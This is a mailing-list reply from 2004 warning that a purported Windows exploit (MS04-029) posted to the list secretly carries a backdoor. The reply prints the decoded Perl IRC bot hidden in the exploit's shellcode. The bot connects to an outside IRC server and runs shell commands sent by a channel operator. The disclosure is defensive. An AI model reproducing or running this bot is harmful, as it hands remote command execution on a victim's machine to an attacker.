Full Disclosure mailing list archives
Re: New Remote Windows Exploit (MS04-029)
From: Barrie Dempster <barrie () reboot-robot net>
Date: Wed, 03 Nov 2004 21:18:56 +0000
Excellent exploit, I'm sure no one will spot that perl IRC bot in there, nope no one will see that... (hint for the readers, try looking at the ascii out put of the "char *shellcode_payload=" data, looks a little like the following....) [code] #!/usr/bin/perl $c han="#0x";$nick="k ";$server="ir3ip.n et";$SIG{TERM}={}; exit if fork;use I O::Socket;$sock = IO::Socket::INET-> new($server.":6667 ")||exit;print $so ck "USER k +i k :k v1\nNICK k\n";$i=1 ;while(<$sock>=~/^ [^ ]+ ([^ ]+) /){$ mode=$1;last if $m ode=="001";if($mod e=="433"){$i++;$ni ck=~s/\d*$/$i/;pri nt $sock "NICK $ni ck\n";}}print $soc k "JOIN $chan\nPRI VMSG $chan :Hi\n"; while(<$sock>){if (/^PING (.*)$/){pr int $sock "PONG $1 \nJOIN $chan\n";}i f(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\ w]*:[^ :\w]* (.*)$ /$1/){s/\s*$//;$_= `$_`;foreach(split "\n"){print $sock "PRIVMSG $chan :$ _\n";sleep 1;}}}#/ tmp/hi [/code] -- Barrie Dempster (zeedo) - Fortiter et Strenue http://www.bsrf.org.uk [ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]
Attachment:
signature.asc
Description: This is a digitally signed message part
Current thread:
- New Remote Windows Exploit (MS04-029), (continued)
- New Remote Windows Exploit (MS04-029) Max Load (Nov 03)
- Re: New Remote Windows Exploit (MS04-029) Dave Aitel (Nov 03)
- Re: New Remote Windows Exploit (MS04-029) Heikki Toivonen (Nov 03)
- Re: New Remote Windows Exploit (MS04-029) Brendan Dolan-Gavitt (Nov 03)
- Re: New Remote Windows Exploit (MS04-029) Rodrigo Barbosa (Nov 04)
- Re: New Remote Windows Exploit (MS04-029) Valdis . Kletnieks (Nov 04)
- Re: New Remote Windows Exploit (MS04-029) Rodrigo Barbosa (Nov 04)
- Re: New Remote Windows Exploit (MS04-029) Valdis . Kletnieks (Nov 04)
- Re: New Remote Windows Exploit (MS04-029) Brent J. Nordquist (Nov 04)
- Re: New Remote Windows Exploit (MS04-029) Valdis . Kletnieks (Nov 04)
- New Remote Windows Exploit (MS04-029) Max Load (Nov 03)
- Re: New Remote Windows Exploit (MS04-029) EmÃlio Wuerges (Nov 04)
- RE: New REmote Windows Exploit (MS04-029) raza (Nov 03)
- Re: New REmote Windows Exploit (MS04-029) DanB UK (Nov 04)
- Re: New REmote Windows Exploit (MS04-029) Ferdinand Klinzer (Nov 04)
- Re: New REmote Windows Exploit (MS04-029) Vincent Archer (Nov 04)
- Re: New REmote Windows Exploit (MS04-029) Ferdinand Klinzer (Nov 04)
- Re: New REmote Windows Exploit (MS04-029) Steve Hulshof (Nov 04)
- RE: New REmote Windows Exploit (MS04-029) raza (Nov 04)